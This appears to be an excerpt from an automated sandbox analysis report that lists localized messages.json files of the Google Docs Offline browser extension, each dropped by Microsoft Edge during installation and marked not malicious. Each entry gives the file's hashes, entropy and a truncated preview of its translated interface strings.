                                                                                                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
